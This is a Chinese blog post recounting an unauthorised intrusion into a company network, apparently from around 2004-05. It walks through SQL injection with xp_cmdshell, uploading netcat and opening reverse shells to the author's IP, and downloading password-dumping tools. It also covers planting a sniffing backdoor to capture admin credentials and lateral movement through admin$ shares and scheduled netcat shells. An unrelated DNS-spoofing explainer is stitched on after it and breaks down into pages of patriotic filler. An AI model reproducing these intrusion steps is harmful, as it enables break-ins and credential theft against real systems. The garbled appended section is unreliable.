记一次艰苦的入侵- -

                         

 

04年不平凡的一年,各种漏洞相继发现,各种入侵技巧也应运而生,原本固若金汤的机器,在新的漏洞面前,也变的弱不禁风。牛人发现并编写的Serv-u的溢出程序,为提升系统权限大开方便之门,NBSI把 SQL注入发挥的淋漓尽致,PHP注入也日趋成熟,哪位怪才发现的上传漏洞在很多脚本中也都花样倍出,像DV,DZ等等大名鼎鼎的 论坛也是漏洞叠报,数家著名公司被敲诈,黑客组织也是明争暗斗,虚拟主机也饱受旁注困扰。攻与防就像矛与盾,从某种意义上来说,攻就是防,防就是攻!
“千里之堤,溃于蚁穴”,一个小小的漏洞就可以攻克一台机器,甚至占领整个内部网络。本文以一台机器为突破口,然后如何利用内网其它机器做跳板,最后控制目标机器(如果说利用一台机器上的某个站点来控破渌镜憬兄苯优宰⒌幕埃枷氚牙猛煌谧钊醯囊惶ɑ鳎创锏娇刂谱钋康幕鹘形式优宰ⅲ壬溉肭峙季踝藕锰悖涫捣椒ê芏嗯H嗽缬美昧耍荚谡饫锵殖罅耍?/DIV>
一、通过 SQL注入漏洞,反向连接数据库机器。
利用NBSI扫描发现存在 SQL注入漏洞,而且还是SA权限,如图1

                                   图1
利用NBSI的DOS执行命令,输入ipconfig –all 发现网址与WEB服务器不同,但是从网关上来看是在同一网段内。执行netstat –an查看数据库服务器所开的端口,发现很多1433端口都是WEB服务器连接,21,23,80端口没!利用NBSI的浏览目录功能,没发现机器上存在PCANYWHERE和SERV-U(利用它们可以远程控制,提升权限,或猜测口令)。利用net start 命令没发现如瑞星,KV等杀毒软件或_blank">防火墙服务,然后利用HSCAN1。2和NMAP3。7扫描数据库服务器的外网IP进,竟然没扫到一个开放的端口!(估计机器上装了硬件_blank">防火墙!)对付_blank">防火墙,偶想到了反向链接,在本地开了一个TFTP,利用命令, tftp –I ip get nc.exe 很幸运的上传了一个NC上去,利用同样的方法也上传了一个MT。EXE(MT.EXE是一个网络管理方面的软件,依照yy3的说法,也就是 "七拼八凑来的,纯粹是图个方便。"可是这个方便个真的是太方便了,仅40K的一个程序,但是集合了近四十种的命令于一身)上去。也可以利用FTP命令,把FTP命令用ECHO命令写进一个文件里面,最后在用FTP –S:FILENAME来实现文件的下载。在本机利用NC监听66端口,命令如下:NC –L –P 66 ,远程机器上执行:NC –E CMD。EXE  IP  66不一会儿,一个SHELL就出来了(还是在这里面运行命令爽啊,在NBSI里憋死了,有时在NBSI里执行命令时会出现“意外数据”,还要被破在游览器里执行_cmdshell%20'dos">http://www.***.com.tw/***/***.asp? mode=1&ID=256;exec%20master..xp_cmdshell%20'dos command';--)利用net view  命令查看共有三台机器!如图2

                                     图2
[NextPage]
 
在利用命令:NET VIEW //机器名  时得到的内容为空,看来是没共享目录啊!
二、上传反弹、监听 木马显奇功。
利用MT。EXE –SYSINFO命令显示出数据库服务的系统信息,网卡信息,配置信息,和所安装的软件信息。如图3(只截了系统信息)

图3
是WIN2003怪不得用MT –FINDPASS命令没显出密码来,它只显示的2K的密码。利用命令mt –netget http://www.***.com/findpass2003.exe(mt -netget <url> <filename to saved>       ---Download from http/ftp.)下载到本地一个看WIN2003密码的软件!!运行findpass2003.exe后没有在内存中找到密码!(看来的想办法让管理员登录了!哈哈)
运行命令: mt –netget  http://www.***.com/hacan120.rar  hscan.rar 下载一个HSCAN1。2进去,利用同样的方法又下载进去一个UNRAR。EXE然后执行命令:unrar.exe x hscan.rar 这样就把HSCAN。RAR解压到HSCAN目录当中了!可以利用HACSN1。2版本的DOS命令进行内网扫描,命令如下:hscan -h www.target.com -all –ping扫完其余两台以后没发现任何弱口令,但发现它们在内网中开了很多端口,如:21,80,135,139,3389 等
注意:HSCAN扫描完了以后,会生成报告,自动用浏览器打开,应该利用MT –PSLIST  和MT –PSKILL把这个浏览器关掉!
即然开了3389能不能利用端口重定向,把它定向到数据库这台机器上呢,经过实践利用mt -redirect <TargetIP> <TargetPort> <ListenPort>   ----TCP port redirector. 和利用FPIPE都没有成功(定向后,用NETSTAT –AN命令看是端向成功,但是在外网还是没法访问)哪数据库这台机器能不能利用带反弹型的图形 木马来控制屏幕呢?实践证明利用神气儿,灰鸽子,溯雪都失败了!看来只能装DOS版的后门了,哪试试APR欺骗如何?因在DOS下没法安装图形界面的WINPCAP,所以ARPSINFFER。EXE无法运行!(后来自己做了一个DOS版的)
这台机器上除了操作系统,数据库,WIN2003补丁外什么都没装,难道真的就没有办法了吗?这时偶想到了一个 木马,一个女黑客编写的,即有反向连接功能,又有监听功能,是什么呢?聪明的朋友,你猜到了吗?她就是大名鼎鼎,如雷贯耳,威名远波,无所不知的WOLLF(偶好喜欢她啊! 哈哈)运行WOLLF –SETUP后做一个反向链接的 木马,偶选择的是反向链接所取的IP放在一个HTTP 空间的文件中!制作好后,同样利用MT。EXE –NETGET命令下载到数据库服务器当中,运行后,它会自动向你的HTTP 空间中存放的文件中去取反向链接的IP和端口,这时你可以在本机上用NC –L –P PORT 慢慢等待,一会以后,反向连接成功了,输密码进入吧!如图4

 
                                 图4
[NextPage]
 
进入后,执行命令:SNIFF <Log_file> (她可以监听 ftp/smtp/pop3/http四种密码经过网卡的 )findpass2003.exe不是还没找到密码吗?这时候,利用MT.EXE –PSKILL命令把它的数据库停掉,偶就不信管理员不来!在WOLLF环境下执行EXIT退出(但是监听程序还是在运行的,如果执行QUIT后,就不监听了),累死偶了,睡觉去了!
一觉醒来,太阳都老高了,睡懒觉可真舒服啊!在倒连上去看看有没有抓到有价值的信息,先输入命令:SNIFF_STOP把监听停下,在利用WOLLF带的GET命令把监听的文件下载下来,哈,收获可真不小如图5所示:


                                   图5
图5所示监听到固若金汤的WEB服务器的一个80端口的用户名和密码,登录上一看,原理是一个 会员的!还监听到一台机器的21端口的用户名和密码了和这台机器的25端口的一个MAIL,查看其IP后发现它就是上面利用NET VIEW看到的三台机器中的一台,就叫它“邮件WEB服务器”吧,在外网扫描还发现它开了80端口!看来这台机器有两个作用:一是作为邮件服务器,另一个作用就是开了80端口,上面放了部网站内容,而主要网站的内容则在哪台固若金汤的WEB服务器上(在外网扫描它进,只开了80端口,真够狠!哪台邮件WEB服务器对外网也仅开了21,25,80,110四个端口)先别忙登录啊!可不要忘了哪个findpass2003命令啊!如图6:


                         图6
利用net user username看了一下这个用户是管理员啊!密码设置的很变态字母数字特殊字符都有,管理员一般都有一个习惯,所有机器上的管理员的密码都相同,后来验证,果然如此!
得到用户名和密码后,试图在数据库服务器上对另外两台机器执行命令:net use //IP/admin$ passwd /user:username 均没有成功!
三、邮件WEB服务器做跳板,直捣黄龙;
FTP登录邮件WEB服务器,还是Serv-U FTP-Server v2.5k,会不会能溢出呢?登录成功后,上传一个海顶2005和NC。EXE上去,再次反向链接如图:7

                                                                                                                                               图7
[NextPage]
 
利用IPC漏洞(在这台机器上对WEB服务器竟然能成功!哈哈)
1.net use //WEB服务器/admin$ password /user: username
其中username,password为连接远程主机时提供的用户名与密码
2.copy x:/nc.exe //WEB服务器/admin$
拷贝NC到WEB服务器上
3.net time //远程主机名
显示WEB服务器当前的时间假如为09:12
3.at //WEB服务器 09:14 nc.exe –e cmd.exe  218.***.***.165 99
在09:14分WEB服务器自动NC反向链接偶的机器的99端口。如图8


                                 图8
2分钟过去,终于成功了,终于进入到哪台固若金汤的WEB服务器里面了!成功后界面如图9:

图9
其中在反弹的SHELL中利用XYZCMD。EXE这个工具进行在次登录时,没有成功,也就是SHELL中在出SHELL时没有成功,看来是不支持数据的二交互。图中同现的网址已做处理,如有雷同,纯属巧合。希望本方法对大家有所帮助,不管是攻还是防!!
### 正常DNS请求流程 当客户端设备尝试访问互联网上的某个资源时,通常会经历如下过程来获取目标域名对应的IP地址: 1. **本地缓存查询** 客户端首先会在自身的DNS缓存中查找是否有该域名对应的信息。如果存在,则直接返回结果给应用程序。 2. **向指定DNS服务器发送请求** 如果未命中本地缓存,操作系统将根据配置文件中的设置(通常是ISP提供的默认DNS服务器),向特定的DNS服务器发起查询请求。 3. **迭代查询机制** 接收到请求后,DNS服务器按照根域、顶级域(TLD)到具体子域逐级向下寻找权威录,直到找到能够提供确切答案的一方为止。此过程中可能涉及多个不同层次的服务节点参与响应[^1]。 4. **递归解析服务** 对于某些不具备完整路径信息的小型网络环境而言,默认使用的公共或私有DNS可能会主动代替用户完成整个链条式的搜索工作,并最终反馈最接近真实的映射关系数据给最初发出询问的那一端。 5. **更新并存储结果至缓存** 成功获得应答之后,不仅会立即告知发问者所求内容的位置参数,还会将其暂时保存起来以便后续重复利用减少延迟时间成本。 ```python import socket def get_ip_address(domain_name): try: ip_addr = socket.gethostbyname(domain_name) return ip_addr except Exception as e: print(f"Error resolving {domain_name}: {e}") return None print(get_ip_address('example.com')) ``` ### DNS欺骗攻击原理 DNS欺骗是一种通过篡改合法DNS回应包使得受害者计算机错误地信任伪造的数据从而被误导连接到恶意站点的技术手段。主要形式包括但不限于以下几种情况: - **中间人攻击 (Man-in-the-Middle Attack)** 黑客位于通信双方之间截获流量并对其中携带的目标主机名解析文实施替换操作,使受害者的机器误认为得到了正确的回复而实际上已被导向了黑客控制下的虚假页面。 - **缓存投 (Cache Poisoning/DNS Spoofing)** 这是最常见的DNS欺骗手法之一,它并不依赖物理位置优势而是试图干扰那些负责维护名称空间映射表项的基础设施组件——即各级各类别的DNS服务器本身内部状态机逻辑判断失误进而接受来自外界未经验证的消息体作为事实依据录入数据库内长期留存下来供以后参照使用直至过期清除重置之前都会持续生效影响范围广泛难以察觉修复难度较大。 - **源地址伪装 (Source Address Impersonation)** 利用UDP协议无须建立三次握手确认链接特性容易遭受此类威胁的影响;攻击者可随意构造任意源头身份标签附加在向外传播出去的数据单元之上企图蒙混过关绕开防火墙规则限制直达目的地造成破坏后果严重程度取决于实际应用场景关联密切度高低不一。 上述行为均违反了网络安全基本准则,一旦得逞将会带来诸如敏感资料泄露风险增加、商业信誉受损等一系列负面影响不可忽视必须引起高度重视加以防范治理措施落实到位确保系统稳定可靠运行不受外部因素干扰侵害。 ### 防范措施 为了防止DNS欺骗带来的潜在危害,可以从以下几个方面着手加强安全防护能力: - **启用DNSSEC** 使用基于公钥加密算法构建的信任链路认证体系保障每一步骤间传递过来的身份声明真实性无可辩驳杜绝一切非法入侵可能性从根本上解决安全隐患问题提升整体防御水平达到预期效果显著优于传统方式方法论框架下所能实现的最大限度保护强度等级标准线以上。 - **关闭不必要的递归功能** 减少暴露在外的风险敞口面积降低成为重点打击对象的概率值同时也能减轻自身负担提高工作效率节省宝贵计算资源用于更关键的任务处理环节之中去创造更大价值回社会大众群体利益诉求得到更好满足感体验增强满意度评分上升趋势明显可见成效斐然值得借鉴推广开来形成良好示范效应带动周边同行共同进步成长壮大规模经济效应显现出来促进产业健康发展生态良性循环运转顺畅有序高效节能减耗绿色环保可持续发展远景规划蓝图逐步变为现实图景展现在世人面前令人振奋鼓舞人心士气高涨斗志昂扬充满信心迎接未来挑战机遇共舞共创辉煌成就梦想成真指日可待! - **定期打补丁更新软件版本** 关注官方渠道发布的最新消息动态及时安装必要的修正程序消除已知漏洞隐患保持最佳兼容适配性能表现始终处于行业领先行列之内不会因为陈旧落后被淘汰出局失去竞争力市场占有率下滑萎缩衰退消亡命运结局悲惨不堪设想所以务必重视此项工作的开展执行力度严格把控质量关卡不容丝毫懈怠松劲儿马虎大意失荆州前车之鉴历历在目警钟长鸣时刻警惕居安思危防微杜渐未雨绸缪做好充分准备应对未知变数随时可能出现的各种复杂局面变化莫测风云突变考验智慧勇气毅力决心信念信仰力量源泉永不枯竭生生不息绵延传承下去发扬光大发扬广大中华儿女自强不息艰苦奋斗精神风貌展现新时代中国特色社会主义伟大征程上熠熠生辉璀璨夺目的光辉形象屹立世界东方傲视群雄引领潮流风尚标杆旗帜鲜明立场坚定方向明确道路宽广前景光明灿烂无比美好未来就在不远处等待着我们携手奋进一起去开创属于自己的传奇故事书写历史新篇章留下浓墨重彩的一笔贡献人类文明进步事业添砖加瓦增光添彩永载史册流芳百世万古留传千古绝唱震撼心灵深处触动灵魂共鸣激荡起无限遐想憧憬向往之情油然而生心潮澎湃热血沸腾壮志凌云豪情满怀向着更高更强更快更远的目标奋勇前行不断超越自我突破极限追求卓越再创佳绩续写新的篇章开启新征程踏上新起点迈向新高度攀登新高峰创造新奇迹谱写新华章铸就新辉煌![^3]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值